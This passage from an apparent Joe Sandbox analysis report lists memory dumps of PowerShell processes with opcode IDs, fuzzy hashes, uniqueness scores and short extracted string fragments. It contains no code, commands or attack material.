                                                                    • Instruction Fuzzy Hash: 91F1E730A19E8E8FEBA8DF28C8567E937E1FF54310F04426ED84EC7295DB3599418B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2412691384.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: ac91caa74c31427d0f9a75bbfb9a673bd27847277363540c97a04c2016120417
                                                                    • Instruction ID: dea70af1293829d7cb2f92dce0283d5ad7b87206771230dc2b5cebb9b5f5a48f
                                                                    • Opcode Fuzzy Hash: ac91caa74c31427d0f9a75bbfb9a673bd27847277363540c97a04c2016120417
                                                                    • Instruction Fuzzy Hash: C5E1E630A19E4E8FEBA8DF28C8557E977E1FF54310F04826ED84DC72A5DE34A9458B81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2413346811.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9ba50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 0b62109eae500cec934851218f55ef5ddefce5d60d42081a77eefe060816cdbe
                                                                    • Instruction ID: a633c6bba8fdc1a8116d3befcdd020bb6ced30ced11dd9ce774e79cc34c667c6
                                                                    • Opcode Fuzzy Hash: 0b62109eae500cec934851218f55ef5ddefce5d60d42081a77eefe060816cdbe
                                                                    • Instruction Fuzzy Hash: 94D12B31B0EA8E0FE7A5DBA844755BC7BE1EF55220B1901BED05DC71FBDE98AA058301
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2413346811.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9ba50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d937440dd1defec80df2db4694a011875c61fb3ba04758644c2d9b781dc9c429
                                                                    • Instruction ID: be6645fd95385aa0c74e8b4553d75635a7b45cc2b9b7ad15395e644c1b42833b
                                                                    • Opcode Fuzzy Hash: d937440dd1defec80df2db4694a011875c61fb3ba04758644c2d9b781dc9c429
                                                                    • Instruction Fuzzy Hash: A5B14931B0FA8D0FE7A5DBA85C656B87BE2EF55220B0901FBD05DC71E3D999AE048341
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2412691384.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: d9af3ff68c33a64ce405126cf29cb9b1655724f23c92725b41a71b3392f69e5e
                                                                    • Instruction ID: 937ac4167b2791346de77fec825d427167d7b2402becc2e7ddca5dd3b07aa54e
                                                                    • Opcode Fuzzy Hash: d9af3ff68c33a64ce405126cf29cb9b1655724f23c92725b41a71b3392f69e5e
                                                                    • Instruction Fuzzy Hash: F481297072CE495FE798EB1CC4A5AB5B7E1EF95350B1001BDD08AC32A6DA76F842C741
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2413346811.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9ba50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 52989ff5a53d83ba24dc8180852c94dddd590b605e86cbf4a16faeb3834fde1d
                                                                    • Instruction ID: 615b16b56cefdba44d51287beb99351bc47a461fa1a8b4f8745be1af7093b0b3
                                                                    • Opcode Fuzzy Hash: 52989ff5a53d83ba24dc8180852c94dddd590b605e86cbf4a16faeb3834fde1d
                                                                    • Instruction Fuzzy Hash: AB411632B0FA8E0FE7A5D7A844706BC76D1AF55260B5A00BED46CC71FBDD98AE048301
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2413346811.00007FFD9BA50000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BA50000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9ba50000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 6dfbeb942375e6341a8df6a8557725941d0919bb87f59465a8a9e9810d2138ce
                                                                    • Instruction ID: 3e5f16f4adc25d3fa793983a50d1cd910d2832a8b123eceea89aa4c6f1774089
                                                                    • Opcode Fuzzy Hash: 6dfbeb942375e6341a8df6a8557725941d0919bb87f59465a8a9e9810d2138ce
                                                                    • Instruction Fuzzy Hash: D931E632F1FA8B0FE7B597D81C726BC75D29F51265B5900FAD46DC31E2ED887A004241
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000001.00000002.2412691384.00007FFD9B980000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9B980000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_1_2_7ffd9b980000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                    • Instruction ID: 333f0c3eac1a5d91f4108beacc358d331c77337c0c9010f2060171b2afb4b381
                                                                    • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                    • Instruction Fuzzy Hash: 4001677121CB0C8FD748EF0CE451AA5B7E0FB95364F10056DE58AC36A5D636E881CB45
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 605160154eacfecfc33313a135f04453a0cbc996f2fc19364abdeb726f985cc3
                                                                    • Instruction ID: 12af107a276d80c7279543c5f7137d5eddb04f480b891718dc665d36a1d9b2b5
                                                                    • Opcode Fuzzy Hash: 605160154eacfecfc33313a135f04453a0cbc996f2fc19364abdeb726f985cc3
                                                                    • Instruction Fuzzy Hash: 63B16F70E00209DFDF18CFA9C98579EBBF2AF98314F148529D815EB354EB74A841CB95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: c9474fe1f9db7718c10d06da69feb0732ea91f447977dbe562c4d3a0af992e4e
                                                                    • Instruction ID: d3f80c1140a75a922668dda23324b7b55af40a95a21edf9240dccc412860bb20
                                                                    • Opcode Fuzzy Hash: c9474fe1f9db7718c10d06da69feb0732ea91f447977dbe562c4d3a0af992e4e
                                                                    • Instruction Fuzzy Hash: 71B14DB0E00209DFDF14CFA9D99579EBBF2AF88314F148529D814AB354EB74A945CB81
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$x.qk$x.qk$x.qk$-qk$-qk
                                                                    • API String ID: 0-4218789495
                                                                    • Opcode ID: 6d91c36e307fb8ef1e9265d3108fd9b1c0e2f832aa12441dacd934eb90f53a99
                                                                    • Instruction ID: e957d9e2a75c91037586bc471490a7cff8bd096a0c6da6d75ff3e36d8992ce77
                                                                    • Opcode Fuzzy Hash: 6d91c36e307fb8ef1e9265d3108fd9b1c0e2f832aa12441dacd934eb90f53a99
                                                                    • Instruction Fuzzy Hash: 35626FB4A402189FCB64DF14CE55BDEBBB2BB85304F1084EAD9096B395CB31AD85CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                    • API String ID: 0-3752346929
                                                                    • Opcode ID: cf0c184cf6dcc7d78faa9a1b790ca6a44f2ccd3ab88b16dd466124de5a55d009
                                                                    • Instruction ID: cd56928730534cb54cb8cc7fc716cd4e9d3d515df99df20f71f3f6d2c23ac40f
                                                                    • Opcode Fuzzy Hash: cf0c184cf6dcc7d78faa9a1b790ca6a44f2ccd3ab88b16dd466124de5a55d009
                                                                    • Instruction Fuzzy Hash: D3E14AB97042469FCB65DE25C9006EBBBA2BFC6210F1484AFD405CB395DBF6C846C7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$tPkq$tPkq$$kq$$kq$$kq$$kq$$kq$$kq
                                                                    • API String ID: 0-54545125
                                                                    • Opcode ID: 062d6acc7d0d77e3c1c6bb93c8e7dedc194eee239936d64d613c391c91156052
                                                                    • Instruction ID: 0c7bf81a455ca6eb4f2b0eda4555ae3d9db235b9d0f7e9730df1a5b133adcd98
                                                                    • Opcode Fuzzy Hash: 062d6acc7d0d77e3c1c6bb93c8e7dedc194eee239936d64d613c391c91156052
                                                                    • Instruction Fuzzy Hash: CB12D6B5B00215DFCB64CB68C941AABBBE2AF85310F15846FD9059F391DB36DC42CBA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$x.qk$-qk
                                                                    • API String ID: 0-1955630381
                                                                    • Opcode ID: 30519950342e024be09281bd0adcc5c6b123efcb2a3bd903d7d29eecddeaffde
                                                                    • Instruction ID: 6ede37fcea1f4dc24f64871bc4f89bdee47addf6c47fc44b85bfdd35dc0d2bf5
                                                                    • Opcode Fuzzy Hash: 30519950342e024be09281bd0adcc5c6b123efcb2a3bd903d7d29eecddeaffde
                                                                    • Instruction Fuzzy Hash: BC4291B4B002159FDB64DB58C950BAABBB2AF84300F15C46ED9096F755CB31EC86CB92
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4'kq$4'kq$4'kq$4'kq$x.qk$-qk
                                                                    • API String ID: 0-1955630381
                                                                    • Opcode ID: ad8db75ea98dbc123a579571852e30d879909d84e1ad9013af46c47c9e617fa8
                                                                    • Instruction ID: 77bfc5eefde30f5863504ce92b820c4b617efc40b2af572bd53ee6f65f7571c9
                                                                    • Opcode Fuzzy Hash: ad8db75ea98dbc123a579571852e30d879909d84e1ad9013af46c47c9e617fa8
                                                                    • Instruction Fuzzy Hash: 84D1A2B4B402059FC725DB68C950B9EBBB2BB84304F24C82AE9016F795CB75EC45CF95
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$$kq$$kq$$kq$$kq$$kq
                                                                    • API String ID: 0-3090204080
                                                                    • Opcode ID: ecf86ef3f6fe05e440c5e3fd1b58afb0792237ba80752a0c74e78a35a41e01aa
                                                                    • Instruction ID: b02afcf2ceb1f905c476ed139eb73af20823b761d6895b6a3e2e0fb268b396b8
                                                                    • Opcode Fuzzy Hash: ecf86ef3f6fe05e440c5e3fd1b58afb0792237ba80752a0c74e78a35a41e01aa
                                                                    • Instruction Fuzzy Hash: 34F148B9704246CFCB65CB689D116BBBBA6EFC2210F18C46FD445CB361DA36D841C7A1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84~l$84~l$tPkq$tPkq$x.qk
                                                                    • API String ID: 0-18187745
                                                                    • Opcode ID: 36597a876d23053761367c70953920b82ccbe11170597c5f715af321c727f973
                                                                    • Instruction ID: dd293e7701e34e81aab4ffd9d96a5ff9d088ec709b7874821444a6ef7ded54ae
                                                                    • Opcode Fuzzy Hash: 36597a876d23053761367c70953920b82ccbe11170597c5f715af321c727f973
                                                                    • Instruction Fuzzy Hash: F902E7B4B002459FC754DB68CA60BAEBFE2AF85300F15846EE505AF7A5CB32DC45CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$x.qk$x.qk$-qk
                                                                    • API String ID: 0-70501812
                                                                    • Opcode ID: 3bcf2a066ad96da7376f9ef11235fe38a653772d6f37ebba33423f711086ea6b
                                                                    • Instruction ID: d5dfd88dee1932534ff6b634420eb6d78e74d3fec2c6da3c946ab540cbaadbc8
                                                                    • Opcode Fuzzy Hash: 3bcf2a066ad96da7376f9ef11235fe38a653772d6f37ebba33423f711086ea6b
                                                                    • Instruction Fuzzy Hash: 3EF1A1B4B402159FDB64DB18CE51F9EBBB2AB84300F11C8AAD5096F795CB31EC85CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$x.qk$x.qk$-qk
                                                                    • API String ID: 0-70501812
                                                                    • Opcode ID: fedbfba53041e53065396bfc41de65f01a482740413872c174379761059f3b23
                                                                    • Instruction ID: 445273623cbf5cabf67dcdb0e7c9aa9751e45586441ce304ca4b0f3c4038fac7
                                                                    • Opcode Fuzzy Hash: fedbfba53041e53065396bfc41de65f01a482740413872c174379761059f3b23
                                                                    • Instruction Fuzzy Hash: 8CE1A5B4B402149FDB24DB14CE55B9E7BB2EB84300F1484AAD909AF795CB71ED81CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$4'kq$x.qk$-qk
                                                                    • API String ID: 0-3250639330
                                                                    • Opcode ID: 859f75cc36b42e79e5bc6685eec1b34bbb31b3f0537b24a29f2e0717534e0f98
                                                                    • Instruction ID: 8f62ed7a7974063989eb416c8e1d33907ecbd21dd40e4d337834df5ce568ba9a
                                                                    • Opcode Fuzzy Hash: 859f75cc36b42e79e5bc6685eec1b34bbb31b3f0537b24a29f2e0717534e0f98
                                                                    • Instruction Fuzzy Hash: 32B19EB4A002059FC725DB54C950B9EBBB2FB84304F15C45AE9016F3A5CB35EC46CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq$4'kq$x.qk$x.qk
                                                                    • API String ID: 0-2555236014
                                                                    • Opcode ID: 9136a5a1d1fb83fd6eebc2ffc1fa51296d6aa8d41585e4a2962ffd4de41bb00f
                                                                    • Instruction ID: c26909e529d137ead98f8d0823c12f14ba138673d1e07ff9505d4de75101d419
                                                                    • Opcode Fuzzy Hash: 9136a5a1d1fb83fd6eebc2ffc1fa51296d6aa8d41585e4a2962ffd4de41bb00f
                                                                    • Instruction Fuzzy Hash: 870260B4A402199FDB60DF14CE54BDEBBB2AB85300F1084EAD9096B751CB31AEC1CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 84~l$tPkq
                                                                    • API String ID: 0-2897030349
                                                                    • Opcode ID: eb8cc4d3413ca10242e1867d9967125c0c68a5d2be4a4bab2728504f8d333ece
                                                                    • Instruction ID: e47957f9365692fb11a52b332bcf247e7ae0af83402ffa3fcbeac06b02198f4e
                                                                    • Opcode Fuzzy Hash: eb8cc4d3413ca10242e1867d9967125c0c68a5d2be4a4bab2728504f8d333ece
                                                                    • Instruction Fuzzy Hash: 3051DFB56093869FC762CF64C860AA6BFB1AF46214F19C0DFD4448F293C7369D46C792
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $kq$$kq
                                                                    • API String ID: 0-3550614674
                                                                    • Opcode ID: 820da2fc23f3981ae7c188985a347d0c213f291e8dd83f13dc16797de4500541
                                                                    • Instruction ID: 7a9d9273d97e4a9b76b86a2846bf01018dd1acf4d2db4cdda2678e2ccee38d07
                                                                    • Opcode Fuzzy Hash: 820da2fc23f3981ae7c188985a347d0c213f291e8dd83f13dc16797de4500541
                                                                    • Instruction Fuzzy Hash: 901193B9309386CFD766CF24DC109A2BF75AFC2214B19819FE5448B2B2D636D901C761
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: `Brk
                                                                    • API String ID: 0-2920665621
                                                                    • Opcode ID: feb659fc3e2f220fc6caba1ab601cc0e51839798662c66a41b6cad7364733eaf
                                                                    • Instruction ID: 149dad5ffb5cc3ac5a41613921769ecbfb33394a65c0544a7e8b88bee26ecff9
                                                                    • Opcode Fuzzy Hash: feb659fc3e2f220fc6caba1ab601cc0e51839798662c66a41b6cad7364733eaf
                                                                    • Instruction Fuzzy Hash: 472284B8B40209DFD750CB58CA50E9ABBF2BB89314F15C46AE905AF755CB32EC41CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: h2sk
                                                                    • API String ID: 0-642491371
                                                                    • Opcode ID: 19223e1b0ce57ecf303d512c51769bb0d2beccc0a9cdbb6cdca44920fbe7ea89
                                                                    • Instruction ID: 67f264c68267470e684133772abd8e0f17eddf3e112a424234d6fbc1dd55459e
                                                                    • Opcode Fuzzy Hash: 19223e1b0ce57ecf303d512c51769bb0d2beccc0a9cdbb6cdca44920fbe7ea89
                                                                    • Instruction Fuzzy Hash: AD024CF8B00209DFD750CB58CA50E9AB7E2BB89304F15C46AE905AF756C772EC42CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: 4'kq
                                                                    • API String ID: 0-3255046985
                                                                    • Opcode ID: 885983573932d447a1627d0181c9d49e56344605adc144093629678bed5fe34e
                                                                    • Instruction ID: 917b1a457b0697470c78ac8b9d94b4a432784c3b555b4f9dce1ebf184f12a752
                                                                    • Opcode Fuzzy Hash: 885983573932d447a1627d0181c9d49e56344605adc144093629678bed5fe34e
                                                                    • Instruction Fuzzy Hash: D43148F9A043219BDBA0CA7489017FB7B929B81210F1804AFC500CF7D1DB35C992C7A6
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: x.qk
                                                                    • API String ID: 0-1364774114
                                                                    • Opcode ID: 530e9da58ebec9f887485cd450f0dd589fc751c026638060befba923b3473d8b
                                                                    • Instruction ID: 317e43a468622db23e109609bc2c86f13b96bb8ca2a10cbf707b5f4f3b9085d8
                                                                    • Opcode Fuzzy Hash: 530e9da58ebec9f887485cd450f0dd589fc751c026638060befba923b3473d8b
                                                                    • Instruction Fuzzy Hash: 183192B4B40204AFD714EB64CA15FAE7BA3ABC4304F15C829EA016F795CF769C458BA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 577610adec3e303b26173c69179aabf13ec83bf2f7dde69ee0026a2ca7300bcb
                                                                    • Instruction ID: 22ba9bce7ba4c49c25f13a4131c69687fa005c359f02c1575811c0503e69cc03
                                                                    • Opcode Fuzzy Hash: 577610adec3e303b26173c69179aabf13ec83bf2f7dde69ee0026a2ca7300bcb
                                                                    • Instruction Fuzzy Hash: FB626DB8B00204DFDB50CB98CA51A9EBBF2BB85314F25C46AE905AF355CB72EC45CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 07cba282348c390f5973921f8e3f6c40dcadb1d8056bd94c765c8fe692a53bd3
                                                                    • Instruction ID: 7f54d8eaaa46f4ff4992d91d52267079a81269f36e01abeada432bf1dfc3a8bf
                                                                    • Opcode Fuzzy Hash: 07cba282348c390f5973921f8e3f6c40dcadb1d8056bd94c765c8fe692a53bd3
                                                                    • Instruction Fuzzy Hash: 13324CB8A00205DFDB50CB58CA51E9EFBB2BB85314F25C46AE905AF355CB72EC45CB50
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: bc5474a282814bce2007131b0ba74ffbd621a41901b9331e2f5c6cc36e96fe6a
                                                                    • Instruction ID: 5934bf3bc06dd961c73dba2da65c6704d43e5f7306815c477160cce9f7807382
                                                                    • Opcode Fuzzy Hash: bc5474a282814bce2007131b0ba74ffbd621a41901b9331e2f5c6cc36e96fe6a
                                                                    • Instruction Fuzzy Hash: C3123AB8A00205DFDB50CB98CA41E9EFBB2BB85314F25C46AE905AF365CB71EC45CB51
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2311287417.00000000074C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 074C0000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_74c0000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
                                                                    • Opcode ID: 519e6607b7360e79607befbbab9b1a9d1b2e46b748bdf5b232b23519af894399
                                                                    • Instruction ID: e3cbf935a6986bac2d3fc8ff47e023c0d3e2efdb66a1c6e8ad57e9661c0039e6
                                                                    • Opcode Fuzzy Hash: 519e6607b7360e79607befbbab9b1a9d1b2e46b748bdf5b232b23519af894399
                                                                    • Instruction Fuzzy Hash: 9B022CF8A00209DFD750CF58CA40E9AB7F2BB89314F15C56AE905AB756C772EC42CB91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    Memory Dump Source
                                                                    • Source File: 00000007.00000002.2304173590.0000000004640000.00000040.00000800.00020000.00000000.sdmp, Offset: 04640000, based on PE: false
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_7_2_4640000_powershell.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID:
                                                                    • API String ID:
